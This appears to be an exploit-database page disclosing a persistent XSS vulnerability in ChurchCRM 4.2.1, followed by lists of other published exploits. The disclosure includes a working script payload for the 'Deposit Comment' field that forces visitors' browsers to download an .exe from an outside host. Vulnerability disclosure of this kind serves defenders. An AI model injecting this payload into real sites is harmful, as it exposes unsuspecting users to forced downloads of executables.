Become a patron and gain access to the dashboard, Schedule scans, API and Search patron

"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"

Author

Exploit author

"Mufaddal Masalawala"

Platform

Exploit platform

multiple

Release date

Exploit published date

2020-12-02

Download file

#Exploit Title: ChurchCRM 4.2.1- Persistent Cross Site Scripting(XSS)
#Date: 2020- 10- 29
#Exploit Author: Mufaddal Masalawala
#Vendor Homepage: https://churchcrm.io/
#Software Link: https://github.com/ChurchCRM/CRM
#Version: 4.2.1
#Tested on: Kali Linux 2020.3
#Proof Of Concept:
ChurchCRM application allows stored XSS , via 'Add new Deposit' module, that is rendered upon 'View All Deposits' page visit. There are multiple locations where this can be replicated To exploit this vulnerability:

   1. Login to the application, go to 'View all Deposits' module.
   2. Add the payload ( <script>var link = document.createElement('a');
   link.href = 'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe';
   link.download = ''; document.body.appendChild(link); link.click();
</script>
   ) in the 'Deposit Comment' field and click "Add New Deposit".
   3. Payload is executed and a .exe file is downloaded.

Release Date	Title	Type	Platform	Author
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"ILIAS Learning Management System 4.3 - SSRF"	webapps	multiple	Dot
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"
2020-12-02	"Microsoft Windows - Win32k Elevation of Privilege"	local	windows	nu11secur1ty
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"Pharmacy Store Management System 1.0 - 'id' SQL Injection"	webapps	php	"Aydın Baran Ertemir"

Release Date	Title	Type	Platform	Author
2020-12-02	"Under Construction Page with CPanel 1.0 - SQL injection"	webapps	multiple	"Mayur Parmar"
2020-12-02	"EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Stored Cross Site Scripting"	webapps	multiple	"Soushikta Chowdhury"
2020-12-02	"Expense Management System - 'description' Stored Cross Site Scripting"	webapps	multiple	"Nikhil Kumar"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"EgavilanMedia User Registration & Login System with Admin Panel 1.0 - CSRF"	webapps	multiple	"Hardik Solanki"
2020-12-02	"Student Result Management System 1.0 - Authentication Bypass SQL Injection"	webapps	multiple	"Ritesh Gohil"
2020-12-02	"ILIAS Learning Management System 4.3 - SSRF"	webapps	multiple	Dot
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"WebDamn User Registration & Login System with User Panel - SQLi Auth Bypass"	webapps	multiple	"Aakash Madaan"

Release Date	Title	Type	Platform	Author
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover"	webapps	php	"Mufaddal Masalawala"
2020-12-01	"Tendenci 12.3.1 - CSV/ Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-11-10	"Anuko Time Tracker 1.19.23.5325 - CSV/Formula Injection"	webapps	php	"Mufaddal Masalawala"
2020-09-07	"grocy 2.7.1 - Persistent Cross-Site Scripting"	webapps	php	"Mufaddal Masalawala"

import requests

response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/49172/?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Search for hundreds of thousands of exploits

"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.